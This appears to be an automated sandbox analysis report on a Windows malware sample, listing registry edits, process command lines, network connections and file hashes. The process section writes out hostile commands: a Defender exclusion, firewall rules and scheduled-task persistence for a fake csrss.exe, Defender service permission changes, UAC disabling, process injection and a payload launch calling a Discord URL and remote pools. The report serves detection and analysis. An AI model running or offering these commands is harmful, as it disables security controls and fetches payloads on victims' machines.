| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe
"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
"C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe"
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"
C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"
C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"
C:\Users\Admin\AppData\Local\Temp\u318.0.exe
"C:\Users\Admin\AppData\Local\Temp\u318.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\u318.1.exe
"C:\Users\Admin\AppData\Local\Temp\u318.1.exe"
C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"
C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1180
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.234:80 | tcp | |
| US | 8.8.8.8:53 | nic-it.nl | udp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| RU | 193.233.132.234:80 | tcp | |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| US | 172.67.182.192:443 | onlycitylink.com | tcp |
| US | 172.67.182.192:443 | onlycitylink.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| DE | 138.201.79.103:80 | nic-it.nl | tcp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.90.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.182.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.79.201.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.176.67.172.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | tcp | |
| US | 20.157.87.45:80 | tcp | |
| DE | 185.172.128.150:80 | tcp | |
| DE | 185.172.128.150:80 | tcp | |
| BG | 185.82.216.104:443 | tcp | |
| DE | 185.172.128.150:80 | tcp | |
| US | 162.159.130.233:443 | tcp | |
| US | 104.21.94.82:443 | tcp | |
| US | 8.8.8.8:53 | 211.14.97.104.in-addr.arpa | udp |
| FR | 143.244.56.51:443 | tcp | |
| BG | 185.82.216.104:443 | tcp | |
| US | 20.9.155.145:443 | tcp | |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | tcp | |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | tcp | |
| N/A | 185.172.128.90:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| DE | 185.172.128.228:80 | tcp | |
| DE | 185.172.128.59:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 20.157.87.45:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 3.33.249.248:3478 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.104:443 | tcp | |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trythisgid.com | udp |
| CZ | 46.8.8.100:443 | trythisgid.com | tcp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| US | 8.8.8.8:53 | 44.27.3.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.4.79.80.in-addr.arpa | udp |
| N/A | 127.0.0.1:31465 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp |
Files
memory/2272-1-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp
memory/2272-0-0x000001C2F2C50000-0x000001C2F2C7A000-memory.dmp
memory/2272-2-0x000001C2F30A0000-0x000001C2F30FE000-memory.dmp
memory/2272-3-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp
memory/4556-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/5068-9-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp
memory/5068-11-0x0000020816DF0000-0x0000020816E12000-memory.dmp
memory/5068-15-0x000002082FD40000-0x000002082FDB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5bacjb4t.2cv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4556-17-0x000000007378E000-0x000000007378F000-memory.dmp
memory/5068-16-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp
memory/5068-13-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp
memory/5068-56-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp
C:\Users\Admin\Pictures\f54YikNn1ZYOxjLRnnpha6kV.exe
| MD5 | 949f191270e024e75823b32174f15754 |
| SHA1 | e2685aee44aaee2bc87888ee7c86d77bba313eae |
| SHA256 | c3356a89f9d9962232df6a5d6dbfb42a9e2b2578b2a8d89c20b61c4c2e72c71c |
| SHA512 | d3eea70b18938ab93b4d659a0dcb793ab1f440614763b005c9e3f9bf36e4ad49c87cd9d436d2821c34c194a6ec384c57351be4bf9164caaf269046d29c01a55a |
C:\Users\Admin\Pictures\yNmFIx0VEIOdeJxCA5rHU5LG.exe
| MD5 | 77f762f953163d7639dff697104e1470 |
| SHA1 | ade9fff9ffc2d587d50c636c28e4cd8dd99548d3 |
| SHA256 | d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea |
| SHA512 | d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499 |
C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
| MD5 | 5b1e924864690254027a694596f93e64 |
| SHA1 | 009944ff319f0d966db4f3997ba9f87692f7ce8f |
| SHA256 | a227c8047a9b2cff19327b822c89378d4549f0baee2af1e7345e8ede3adbe29e |
| SHA512 | bbb54905892328d16743d2d953df4ac2c10192ac76b4a99248f64d0c675d487bf74af007d52e2196e80bfa61e84fe7604c8f6be5620102bc1d7820dd89e2d798 |
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
| MD5 | e7d8c688a7e274d4f64ff855ccec3a71 |
| SHA1 | 1ff69bae4d5e511b840077a0cdf57abe2823e71d |
| SHA256 | 4c7f5c70a1e281044e55020112de05cf9369ce8472a4b6f134c8ad0ec5e5195c |
| SHA512 | 281dee6add5a183513907650dc592afdd763782753c9580a573527ad5e72ac69ca1d1c503b958d5a6487e54283e51924707d099fc7d2b3656d8650df81b2fce1 |
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
| MD5 | 7aef256be26ba275609ee1490c072b3a |
| SHA1 | c4dc0e50d0a592fa7841b863ca103c245f67ffac |
| SHA256 | a1989a55517bdd0bf69762472a05cd552f653db70a7da45f79f81692ad2944f2 |
| SHA512 | 4000d2a9b43cff900b4ba9beb60e3fe39160bf9040a24474f411c23055600597b4aea895ed5ccbe61f50fcdb9886e8900a2c0d8789222683aaf427535918fc80 |
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
| MD5 | 6f48d89d3fc445e2f23c6c3c2298fc00 |
| SHA1 | a1ba97ff9bb29a7095217a4e7613401d5686bd3f |
| SHA256 | 35244577e19a854d4d2e93ae9de3f82678c51f56ea3e7fc4f09455034119a163 |
| SHA512 | 3d43ab7f1f65ab33a7852611cc80a0aeed357018eab75b3c460632b08fc28ec8d570acdbe2d50b9f8b564661daeba0c0346911528c13c5f70ddcd42dbd80bf02 |
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
| MD5 | c6275393e9951670df273a3e34a69731 |
| SHA1 | a151e6f58288a0a845b9e07628ab610fc4d22e59 |
| SHA256 | 88b4cf3073182f14ff5e353eb3007049061383d90009cb9b3c18c5098a89c79c |
| SHA512 | daed7e918b153cdc97d671cca4bde0701c05473d921e339ea5ee44c1a0f2c3a128f2c9fca0940a4b38fa73e55c024e351ec6e8d8e5ec11e5339765864435e2b2 |
C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
| MD5 | 8938be9b1ac1f7cfc1104628fd55c164 |
| SHA1 | 3f85babacf62c0443b17c7c5af470dd11648e3b3 |
| SHA256 | 2f000b4830c2267d4b1d17231a5c249b79a0d62ff2bfd0ef3d01763a5d1b4d03 |
| SHA512 | ba2619bbc481c70d85eaf862b60e8cdf4c588540742a8343b057f95212468c41b1ea244376c9122feb69d236cfdc2c2d423c29acb458e40a12c947a398b55a92 |
C:\Users\Admin\AppData\Local\Temp\u318.0.exe
| MD5 | ac3b1a30e96b6d89ce98a21bb5b2093a |
| SHA1 | 4270104678195b8cad3520a704c556155a0a65b5 |
| SHA256 | 803946c2712aec2b60b54b3cd7c3375a9a0158e7ccbfbd4ab8a66e6ddfc7d463 |
| SHA512 | 65e74527ffa9d6e776d063db44322080315a5a9eb13bb67acd61be6e65862ec127366d742beca349c7ca8281e2f67193bafc14c8c0ee3f222b19b452d05c8491 |
memory/4748-116-0x0000000006CD0000-0x0000000006D06000-memory.dmp
memory/4748-119-0x0000000007340000-0x0000000007968000-memory.dmp
memory/4748-125-0x00000000072B0000-0x00000000072D2000-memory.dmp
memory/4748-128-0x0000000007B90000-0x0000000007EE0000-memory.dmp
memory/4748-127-0x0000000007A50000-0x0000000007AB6000-memory.dmp
memory/4748-126-0x00000000079E0000-0x0000000007A46000-memory.dmp
memory/4748-130-0x00000000086C0000-0x000000000870B000-memory.dmp
memory/4748-129-0x0000000008150000-0x000000000816C000-memory.dmp
memory/4748-149-0x0000000009250000-0x000000000928C000-memory.dmp
memory/4748-198-0x0000000009310000-0x0000000009386000-memory.dmp
memory/1976-342-0x000000006F2F0000-0x000000006F33B000-memory.dmp
memory/1976-347-0x000000000A720000-0x000000000A73E000-memory.dmp
memory/1976-346-0x000000006EE90000-0x000000006F1E0000-memory.dmp
memory/4748-359-0x000000006EE90000-0x000000006F1E0000-memory.dmp
memory/4748-358-0x000000006F2F0000-0x000000006F33B000-memory.dmp
memory/3200-366-0x000000000A470000-0x000000000A504000-memory.dmp
memory/1976-353-0x000000000A780000-0x000000000A825000-memory.dmp
memory/3200-352-0x000000006EE90000-0x000000006F1E0000-memory.dmp
memory/3564-573-0x000000006F2F0000-0x000000006F33B000-memory.dmp
memory/3200-343-0x000000006F2F0000-0x000000006F33B000-memory.dmp
memory/3564-576-0x000000006EE90000-0x000000006F1E0000-memory.dmp
memory/1976-341-0x000000000A740000-0x000000000A773000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u318.1.exe
| MD5 | bdd4b83b24911fa921092e096d399ac9 |
| SHA1 | 1a9d97edbce74e14676b7362a1f35ee87e934448 |
| SHA256 | 86e8ec464f8b3a2877085e8f0e05d75f451f099cbd8d9973bad7a3e113145b4a |
| SHA512 | ba1382c9cae8242f78ebc6c61a636c167e8efbd5500cd0848c1deb26708d17e033ebc19835677ceb68d96a1c7b5b49b091b047db070dfa31809bdcf3ea791f1d |
memory/3932-659-0x0000000000400000-0x0000000002597000-memory.dmp
memory/1976-1015-0x000000000A900000-0x000000000A91A000-memory.dmp
memory/3200-1045-0x000000000A3B0000-0x000000000A3B8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 358eecb6abe7d5671be391357eda3991 |
| SHA1 | 4b553e8dfb883cbdcb80db0f7f1ba862b26c08e7 |
| SHA256 | cfcfab4ad5c39913e3c10f2de820e22ee17560a0d5f4bd668ea8650d338065b7 |
| SHA512 | 602175b4414ac140bf624247298d3d85f623d5af3a1f3e4529c1711013f874171a4958b0d8793506f66bd0b031f23320fbd7ec131099a913d5afb302c7b26836 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
